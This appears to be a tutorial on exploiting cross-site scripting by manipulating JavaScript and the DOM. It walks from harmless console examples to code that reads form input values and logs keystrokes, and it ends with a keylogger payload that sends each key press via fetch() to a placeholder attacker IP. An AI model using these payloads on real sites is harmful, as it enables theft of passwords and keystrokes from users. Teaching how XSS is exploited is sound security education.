## Manipulation of JavaScript

JavaScript is a high-level programming language that has become one of the fundamental components of modern web applications. All modern browsers include a JavaScript engine that runs any client-side JavaScript code.

When a browser processes an HTTP response containing HTML, the browser creates a _Document Object Model_ (DOM) tree and renders it.
The DOM includes all forms, inputs, images, etc. on a page.

JavaScript can access and modify the page's DOM, resulting in a more interactive experience for end users. From a vulnerability exploitation perspective, this also means that if we can inject JavaScript, we can access and modify the page's DOM.
With access to the DOM, we can redirect login forms, extract passwords, phish users, and much more.

## Example Function

We will take the example of the following function:

```
function processData(data) {
  data.items.forEach(item => {
    console.log(item)
  });
}

let foo = {
  items: [
    "Hello",
    "Zdravo",
    "Hola"
  ]
}

processData(foo)
```

We start by declaring a function called "processData" that takes an argument  of an array called "data".
The function loops through each value of the key named "items" of the array called "data" (data.items), and logs it onto the console.
Next, an object with a key and it's various values, is stored into the variable "foo".
Finally, the processData function is called, and the variable "foo", is given as the argument.
When we paste the code in our browser's JavaScript terminal, and press enter, the code is executed and the console logs three string outputs.

The question is, why is console.log printing the results to the console?
This is because, console.log is a built-in method within the console API, provided by the browser.
We have access to multiple APIs like so, which we can use to inject JavaScript into the user's browser through a vulnerability.

## Using APIs

We can start of by taking the "Window" API.
This API has properties such as location property and localStorage property, that contains secrets that can be used to exfiltrate secrets.
Another very common method of the Window API, is the alert() method.
This pops up an alert box when the page is loaded onto the browser.

Even though alert() method is the most common method used to identify XSS, the most effective to exploit them is the "Document" API.
The Document API allows us to interface with the DOM, which contains every  part of the page loaded on to the user's browser.
This can be used to create fake phishing pages, exfiltrate cookies, password inputs, include text, create keyloggers, and so on.

We can use the getElementsByTagName() method, which, when given an HTML tag, will return an array of all elements that match that tag.
So, for instance all text boxes for username and password fields are created using the "input" tag.
We can use the following code:

```JavaScript
let inputs = document.getElementsByTagName("input")

for (let input of inputs){
	console.log(input.value)
}
```

We declare a variable inputs, which will grab all "input" tags of the DOM.
It is then passed into a for loop, where the value attribute is extracted.
The value attribute is the text that is entered into the text box.

Another useful method of the Document API is the addEventListener() method.
It accepts an event code (for ex: "keydown" for keypresses) and a function on how to handle the event.

The code can look like following:
```JavaScript
function logKey(event){
	console.log(event.key)
}

document.addEventListener('keydown', logKey)
```

We create a function that will take the event(the key press) as an argument and print the key pressed to the console.

We have found multiple ways to exploit an XSS, however these methods are not very useful, as these only print the result to the victim's console.
To solve this caveat, we will use the "Fetch" API.
The Fetch API allows us to have the user's browser make network requests for remote resources.
This could be for fetching documents, user information, images, and much more.

Fetch doesn't return the data immediately, and instead, it returns a "promise" to complete the execution.
If we need to access the response, we use the "then" method and pass in a function to execute when the response is available.

So the code will be edited to the following:
```JavaScript
function logKey(event){
	fetch("http://<attacker IP>/k?key=" + event.key);
}

document.addEventListener('keydown', logKey);
```

This will make an HTTP request to our Kali machine and include the key pressed.
We can perform the same with other APIs and methods such as the getElementsByTagName() method of the Document API.